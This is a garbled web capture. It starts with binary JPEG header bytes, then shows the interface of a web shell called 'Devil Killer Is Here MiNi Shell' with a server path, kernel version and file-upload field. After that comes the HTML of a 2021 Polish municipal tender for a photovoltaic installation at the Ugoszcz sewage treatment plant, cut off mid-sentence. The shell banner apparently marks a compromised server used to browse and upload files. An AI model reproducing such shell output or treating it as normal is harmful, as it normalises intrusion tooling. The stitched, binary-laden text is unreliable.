JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211021/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20211021/0023997801-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> „Budowa instalacji fotowoltaicznej na Oczyszczalni Ścieków w Ugoszczy” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Studzienice</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Gmina Studzienice</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 770979559</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kaszubska</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Studzienice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">77-143</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL636 - Słupski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">598216607</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia_publiczne@studzienice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">bip.studzienice.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Budowa instalacji fotowoltaicznej na Oczyszczalni Ścieków w Ugoszczy” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-15105658-30c7-11ec-a3fb-0a24f8cd532c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00239978</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-10-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000205/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.3 Budowa instalacji OZE w obiektach użyteczności publicznej na terenach Gminy Bytów i Studzienice.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Europejskie Fundusz Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Pomorskiego na lata 2014-2020 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa<br/>się przy użyciu środków<br/>komunikacji elektronicznej, tj.: miniPortalu, który dostępny jest pod<br/>adresemhttps://miniportal.uzp.gov.pl/, ePUAPu, dostępnego pod adresem<br/>https://epuap.gov.pl/wps/portal orazpoczty elektronicznej e-mail:<br/>zamowienia_publiczne@studzienice.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu<br/>opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z<br/>elektronicznej platformy usług administracji publicznej (ePUAP). Zasady składania ofert oraz<br/>dokumentów składanych wraz z ofertą oraz wymagania techniczne i organizacyjne ich wysyłania<br/>opisane zostały w Instrukcji użytkownika. Wykonawca zobowiązany jest zapoznać się z ww. Instrukcją i<br/>postępować wg zasad w niej wskazanych. Wykonawca ubiegając się o udzielenie zamówienia w<br/>szczególności składając ofertę akceptuje zasady korzystania z systemu miniPortal wskazane w<br/>Instrukcji użytkownika i SWZ. W celu korzystania z systemu miniPortal konieczne jest dysponowanie<br/>przez użytkownika urządzeniem teleinformatycznym z dostępem do sieci Internet. Aplikacja działa tylko<br/>na platformie Windows i wymaga .NET Framework 4.5. W przypadku korzystania z urządzeń<br/>mobilnych oraz Mac lub Linux, dostęp do wszystkich funkcjonalności systemu miniPortal może być<br/>ograniczony. Specyfikacja połączenia, formatu przesyłanych danych oraz kodowania i oznaczania<br/>czasu odbioru danych:<br/> specyfikacja połączenia formularze udostępnione są za pomocą protokołu<br/>TLS 1.2,<br/> format danych oraz kodowanie miniPortal - Formularze dostępne są w formacie HTML z kodowaniem<br/>UTF-8,<br/> oznaczenia czasu odbioru danych – miniPortal - wszelkie operacje opierają się o czas serwera i dane<br/>zapisywane są z dokładnością co do setnej części sekundy,<br/> integracja z systemem ePUAP jest wykonana w wykorzystaniem standardowego mechanizmu ePUAP.<br/>W przypadku Wykonawcy wysyłającego wniosek do Zamawiającego, ESP Zamawiającego<br/>automatycznie generuje Rodzaj Urzędowego Poświadczenia Odbioru, czyli Urzędowe Poświadczenie<br/>Przedłożenia (UPP), które jest powiązane z wysyłanym dokumentem. W UPP w sekcji „Dane<br/>poświadczenia” jest zawarta informacja o dacie doręczenia.<br/>System dostępny jest za pośrednictwem następujących przeglądarek internetowych:<br/> Microsoft Internet Explorer od wersji 9.0,<br/> Mozilla Firefox od wersji 15,<br/> Google Chrome od wersji 20.<br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz<br/>złożenia, zmiany, wycofania oferty lub wniosku”<br/>i „Formularza do komunikacji” wynosi 150 MB.<br/>Ofertę składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej<br/>opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>Sposób złożenia oferty, w tym zaszyfrowania oferty opisany został w „Instrukcji użytkownika”,<br/>dostępnej na stronie: https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, Zamawiający<br/>informuje, że:<br/>1) Jest administratorem danych osobowych Wykonawcy oraz osób, których dane Wykonawca<br/>przekazał w niniejszym postępowaniu;<br/>2) dane osobowe Wykonawcy przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO<br/>w celu związanym z postępowaniem o udzielenie zamówienia publicznego na zadanie pn.: „Budowa<br/>instalacji fotowoltaicznej na Oczyszczalni Ścieków<br/>w Ugoszczy” prowadzonym w trybie podstawowym;<br/>3) odbiorcami danych osobowych Wykonawcy będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r. Prawo<br/>zamówień publicznych (Dz. U. z 2021 r. poz. 1129 z późn. zm.), dalej „ustawa Pzp”;<br/>4) dane osobowe Wykonawcy będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres<br/>4 lat od dnia zakończenia postępowania o udzielenie zamówienia, w sposób gwarantujący jego<br/>nienaruszalność.<br/>5) obowiązek podania przez Wykonawcę danych osobowych bezpośrednio go dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z<br/>ustawy Pzp;<br/>6) w odniesieniu do danych osobowych Wykonawcy decyzje nie będą podejmowane<br/>w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>7) Wykonawca posiada:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych dotyczących Wykonawcy;<br/>− na podstawie art. 16 RODO prawo do sprostowania danych osobowych, o ile ich zmiana nie skutkuje<br/>zmianą wyniku postępowania o udzielenie zamówienia<br/>publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie narusza<br/>integralności protokołu oraz jego załączników;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa<br/>w art. 18 ust. 2 RODO;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy Wykonawca uzna,<br/>że przetwarzanie jego danych osobowych narusza przepisy RODO;<br/>8) Wykonawcy nie przysługuje:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania danych osobowych Wykonawcy jest art. 6 ust. 1 lit. c RODO.<br/>W przypadku, gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 rozporządzenia<br/>2016/679, wymagałoby niewspółmiernie dużego wysiłku, Zamawiający może żądać od osoby, której<br/>dane dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w<br/>szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego lub<br/>konkursu.<br/>Skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub uzupełnienia<br/>danych osobowych, o którym mowa w art. 16 rozporządzenia 2016/679, nie może skutkować zmianą<br/>wyniku postępowania o udzielenie zamówienia publicznego lub konkursu ani zmianą postanowień<br/>umowy w zakresie niezgodnym z ustawą.<br/>Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie ogranicza<br/>przetwarzania danych osobowych do czasu zakończenia postępowania<br/>o udzielenie zamówienia publicznego lub konkursu.<br/>W przypadku danych osobowych zamieszczonych przez Zamawiającego w Biuletynie Zamówień<br/>Publicznych, prawa, o których mowa w art. 15 i art. 16 rozporządzenia 2016/679, są wykonywane w<br/>drodze żądania skierowanego do Zamawiającego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RI.271.14.2021.NJ</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zakres przedmiotu zamówienia obejmuje w szczególności:<br/>1) dostawę i montaż w oparciu o posiadaną przez Zamawiającego dokumentację techniczną<br/>instalacji fotowoltaicznej o mocy min. 40kWp na Oczyszczalni Ścieków w Ugoszczy, Ugoszcz,<br/>dz. 182, 179/1, gm. Studzienice,<br/>2) zapoznanie pracowników z projektem wykonawczym,<br/>3) przygotowanie placu budowy,<br/>4) przygotowanie konstrukcji nośnej,<br/>5) wytyczenie na dachu konstrukcji systemowych belek aluminiowych, korytek kablowych oraz<br/>wykonanie montażu,<br/>6) montaż paneli fotowoltaicznych na przygotowanej konstrukcji,<br/>7) montaż urządzeń sterujących pracą modułów,<br/>8) ułożenie okablowania w przygotowanych korytach kablowych,<br/>9) montaż inwerterów,<br/>10) montaż rozdzielni RPV AC oraz RPV DC,<br/>11) połączenie elektryczne rozdzielni RPV DC z inwerterami,<br/>12) połączenie elektryczne rozdzielni RPV AC z inwerterami,<br/>13) montaż kompletu elementów instalacji uziemiającej i systemu wyrównywania różnicy<br/>potencjałów elektrycznych,<br/>14) wykonanie systemu z akwizycji danych,<br/>15) kierowanie robotami montażowymi wykonywanymi przez pracowników,<br/>16) wykonanie pomiarów elektrycznych całego systemu,<br/>17) wykonanie pomiarów układów fotowoltaicznych (sprawdzenie funkcjonowania<br/>poszczególnych stringów),<br/>18) próbny rozruch całości instalacji po podłączeniu jej do sieci dystrybucyjnej 0,4kV,<br/>19) szkolenie pracowników Inwestora na temat obsługi i konserwacji systemu fotowoltaicznego i<br/>systemu monitorowania oraz możliwych przypadków nieprawidłowej pracy instalacji,<br/>20) inwentaryzację powykonawczą,<br/>21) zgłoszenie gotowości instalacji fotowoltaicznej do podłączenia do sieci dystrybucyjnej 0,4<br/>kV.<br/>22) zawiadomienie organów Państwowej Straży Pożarnej o zakończeniu wykonania instalacji<br/>fotowoltaicznej i planowanego przystąpienia do jej użytkowania,<br/>23) inne elementy ujęte w załączniku Nr 1 do SWZ i Projekcie umowy stanowiącym załącznik Nr<br/>2 do SWZ.<br/>Szczegółowy zakres prac (Opis Przedmiotu Zamówienia) zawarty jest w załączniku Nr 1 do<br/>SWZ - Dokumentacja techniczna, na który składają się:<br/>1) Projekt budowlano-wykonawczy,<br/>2) Przedmiary robót. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">09331200-0 - Słoneczne moduły fotoelektryczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45311200-2 - Roboty w zakresie instalacji elektrycznych</p> <p class="mb-0">45312310-3 - Ochrona odgromowa</p> <p class="mb-0">45314320-0 - Instalowanie okablowania komputerowego</p> <p class="mb-0">45315300-1 - Instalacje zasilania elektrycznego</p> <p class="mb-0">45317300-5 - Elektryczne elektrycznych urządzeń rozdzielczych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">40 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona oceny ofert, które nie zostały odrzucone, na<br/>podstawie następujących kryteriów oceny ofert:<br/>Lp. Nazwa kryterium Znaczenie kryterium (w %)<br/>1 Cena 60<br/>2 Okres gwarancji 40<br/>Zamawiający dokona oceny ofert przyznając punkty w ramach poszczególnych kryteriów oceny ofert,<br/>przyjmując zasadę, że 1% = 1 punkt.<br/>Punkty za kryterium „Cena” zostaną obliczone według wzoru:<br/>Cn<br/>Pc = ------- x 60 pkt<br/>Cb<br/>gdzie,<br/>Pc - ilość punktów za kryterium cena,<br/>Cn - najniższa cena ofertowa spośród ofert nieodrzuconych,<br/>Cb – cena oferty badanej.<br/>W kryterium „Cena”, oferta z najniższą ceną otrzyma 60 punktów a pozostałe oferty po<br/>matematycznym przeliczeniu w odniesieniu do najniższej ceny odpowiednio mniej. Końcowy wynik<br/>powyższego działania zostanie zaokrąglony do dwóch miejsc po przecinku.<br/>Punkty za kryterium „Okres gwarancji” – (obejmującej całość przedmiotu zamówienia dostarczone<br/>materiały zainstalowane urządzenia i sprzęt, wykonane roboty budowlane, montażowe, instalacyjne)<br/>zostanie dokonana zgodnie z poniższym zasad.<br/>W przypadku zaoferowania minimalnej długości okresu gwarancji tj. 60 miesięcy, Wykonawca otrzyma<br/>zero (0) punktów.<br/>W przypadku zaoferowania maksymalnej długości okresu gwarancji<br/>tj. 72 miesięcy, Wykonawca otrzyma czterdzieści (40) punktów.<br/>W przypadku zaoferowania gwarancji pomiędzy 60, a 72 miesięcy Wykonawca otrzyma pkt wg wzoru:<br/>G o<br/>PG = ----------- x 40 pkt<br/>G max.<br/>gdzie:<br/>PG - wartość punktowa, którą należy wyznaczyć,<br/>G max. - najdłuższy oferowany okres gwarancji,<br/>Go - okres gwarancji podany w badanej ofercie.<br/>Uwaga 1:<br/>Zamawiający określa minimalną oraz maksymalną długość okresu gwarancji,<br/>w przedziale od 60 miesięcy do 72 miesięcy. W przypadku zaoferowania przez Wykonawcę długości<br/>gwarancji krótszego niż 60 m-cy, Zamawiający ofertę odrzuci. W przypadku, gdy Wykonawca w ogóle<br/>nie wskaże w ofercie oferowanego okresu gwarancji Zamawiający przyjmie,<br/>że Wykonawca nie oferuje gwarancji, i ofertę odrzuci. Wykonawca może zaproponować długość<br/>okresu gwarancji dłuższy niż wyznaczony maksymalny 72 miesięcy, jednak w tym przypadku<br/>Zamawiający przyjmie do obliczeń wartość 72 m-cy - najdłuższy przyjęty w kryterium oceny ofert<br/>„Okres gwarancji”. Wykonawcy oferują długości okresu gwarancji w pełnych miesiącach (w przedziale<br/>od 60 do 72 miesięcy).<br/>Uwaga 2:<br/>Wykonawca zapewnia produkty posiadające dodatkową gwarancję producenta modułów<br/>fotowoltaicznych w wymiarze: 25-letnia gwarancja co do wydajności min. 80% mocy oraz minimum 10<br/>lat gwarancji produktowej dla modułów fotowoltaicznych i minimum 7 lat gwarancji dla inwerterów<br/>fotowoltaicznych.<br/>Za najkorzystniejszą ofertę zostanie uznana oferta, która otrzyma największą ilość punktów obliczoną<br/>na podstawie wzoru:<br/>Przyznana ilość punktów = PC + PG<br/>gdzie:<br/>PC - ilość punktów za kryterium cena,<br/>PG - ilość punktów za kryterium okres gwarancji.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w<br/>postępowaniu dotyczące:<br/>-zdolności technicznej lub zawodowej w zakresie:<br/>Opis sposobu dokonywania oceny spełniania tego warunku:<br/>1) Zamawiający określa, że ww. warunek zostanie spełniony, jeśli wykonawca wykaże, że w<br/>okresie ostatnich 5 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia<br/>działalności jest krótszy – w tym okresie), wykonał (a w przypadku świadczeń powtarzających<br/>się lub ciągłych nadal wykonuje) należycie: co najmniej jedno zamówienie polegające na<br/>dostawie wraz<br/>z montażem instalacji fotowoltaicznej o mocy min. 30kWp<br/>i wartości co najmniej 100.000,00 zł brutto (słownie: sto<br/>tysięcy zł).<br/>2) O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy dysponują lub będą<br/>dysponować w okresie wykonywania zamówienia<br/>i skierują do jego realizacji: min. jedną osobę pełniącą funkcję Kierownika budowy i posiadającą odpowiednie uprawnienia budowlane do kierowania<br/>robotami budowlanymi<br/>w specjalności instalacyjnej w zakresie instalacji elektrycznych, których zakres uprawnia go do<br/>kierowania robotami objętymi<br/>przedmiotem zamówienia lub odpowiadające im równoważne uprawnienia budowlane wydane<br/>na podstawie wcześniej obowiązujących przepisów, a w przypadku Wykonawców zagranicznych<br/>– uprawnienia budowlane do kierowania robotami równoważne do wyżej wskazanych.<br/>DODATKOWE INFORMACJE DOTYCZĄCE WARUNKÓW<br/>UDZIAŁU W 